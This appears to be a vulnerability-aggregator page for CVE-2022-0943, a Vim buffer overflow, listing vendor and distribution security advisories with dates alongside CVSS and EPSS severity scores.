CVE-2022-0943
2022-03-14 00:00:00
debiancve
debiancve
CVE-2022-0943
2022-03-14 21:15:00
cve
cve
CVE-2022-0943
2022-03-14 21:15:00
fedora
fedora
[SECURITY] Fedora 36 Update: vim-8.2.4621-1.fc36
2022-03-29 00:20:54
[SECURITY] Fedora 34 Update: vim-8.2.4701-1.fc34
2022-04-11 17:41:31
cloudlinux
cloudlinux
Fix of CVE: CVE-2022-0943
2022-04-05 15:02:59
redhatcve
redhatcve
CVE-2022-0943
2022-03-15 01:24:14
veracode
veracode
Buffer Overflow
2022-03-25 18:20:59
redos
redos
ROS-20220412-01
2022-04-12 00:00:00
photon
photon
Critical Photon OS Security Update - PHSA-2022-0380
2022-04-07 00:00:00
Important Photon OS Security Update - PHSA-2022-3.0-0380
2022-04-07 00:00:00
Critical Photon OS Security Update - PHSA-2022-0168
2022-04-01 00:00:00
almalinux
almalinux
Moderate: vim security update
2022-07-01 00:00:00
redhat
redhat
(RHSA-2022:5242) Moderate: vim security update
2022-06-28 08:27:06
oraclelinux
oraclelinux
vim security update
2022-06-30 00:00:00
cloudfoundry
cloudfoundry
USN-5613-1: Vim vulnerabilities | Cloud Foundry
2022-09-29 00:00:00
ubuntu
ubuntu
Vim regression
2022-09-19 00:00:00
Vim vulnerabilities
2022-09-15 00:00:00
Vim vulnerabilities
2022-06-06 00:00:00
debian
debian
[SECURITY] [DLA 3053-1] vim security update
2022-06-20 12:11:57
[SECURITY] [DLA 3182-1] vim security update
2022-11-08 14:54:53
amazon
amazon
mageia
mageia
Updated vim packages fix security vulnerability
2022-05-25 21:46:18
gentoo
gentoo
Vim, gVim: Multiple Vulnerabilities
2022-08-21 00:00:00
apple
apple
About the security content of macOS Ventura 13
2022-10-24 00:00:00
avleonov
avleonov
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
4.6 Medium
CVSS2
Access Vector
LOCAL
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:L/AC:L/Au:N/C:P/I:P/A:P
0.001 Low
EPSS
Percentile
17.1%
Related for 9E4DE32F-AD5F-4830-B3AE-9467B5AB90A1